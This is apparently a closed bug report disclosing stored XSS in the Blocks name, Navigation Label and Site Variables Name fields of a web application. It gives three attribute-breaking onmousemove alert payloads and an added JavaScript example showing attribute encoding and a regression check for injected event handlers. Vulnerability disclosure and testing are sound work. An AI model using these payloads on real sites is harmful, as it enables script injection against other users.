Stored XSS in Blocks/Navigation/Site Variables (release/1.4.11) #574

Closed
@0verall

  1. Stored XSS in Blocks name
    Refresh the page; it will trigger below the "Recently Viewed" menu.
    Front page: (screenshot)
    payload:
    "onmousemove="alert(1)

  2. Stored XSS in Navigation Label
    payload:
    "onmousemove="alert(/Nav/)

  3. Stored XSS in Site Variables Name
    payload:
    "onmousemove="alert(/site/)

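Added example, not part of the original report and not the project's code: it shows why the three reported payloads work when a stored name or label is written into a double-quoted HTML attribute without encoding, and how attribute encoding neutralises them. The template helper `renderInput`, the `<input>` markup and the assumption that the fields are rendered inside a `value="..."` attribute are hypothetical; the report does not show the affected templates.

```javascript
// Added example (hypothetical helper names; not code from the affected project).

// Encode the characters that can terminate or alter a quoted HTML attribute.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical template: `encode` switches between the vulnerable and fixed output.
function renderInput(name, encode) {
  const v = encode ? escapeAttr(name) : name;
  return `<input type="text" name="name" value="${v}">`;
}

// Minimal attribute scanner for a single tag: lists attribute names roughly the
// way an HTML parser splits them (quoted value, unquoted value, or bare name).
function attributeNames(tag) {
  const inner = tag.replace(/^<\s*[a-zA-Z0-9]+/, '').replace(/\/?>\s*$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Check usable in a regression test: rendered output for a plain text field
// should never contain an on* event-handler attribute.
function eventHandlers(tag) {
  return attributeNames(tag).filter((n) => /^on[a-z]+$/.test(n));
}

// The payloads quoted in the report above.
const reported = [
  '"onmousemove="alert(1)',
  '"onmousemove="alert(/Nav/)',
  '"onmousemove="alert(/site/)',
];

// Render every reported value and list the event handlers found in each tag.
function audit(encode) {
  return reported.map((p) => eventHandlers(renderInput(p, encode)));
}

console.log('unencoded:', JSON.stringify(audit(false)));
console.log('encoded:  ', JSON.stringify(audit(true)));
```

The same check can be run against the rendered Blocks, Navigation and Site Variables views after a fix to confirm that stored names no longer produce extra attributes.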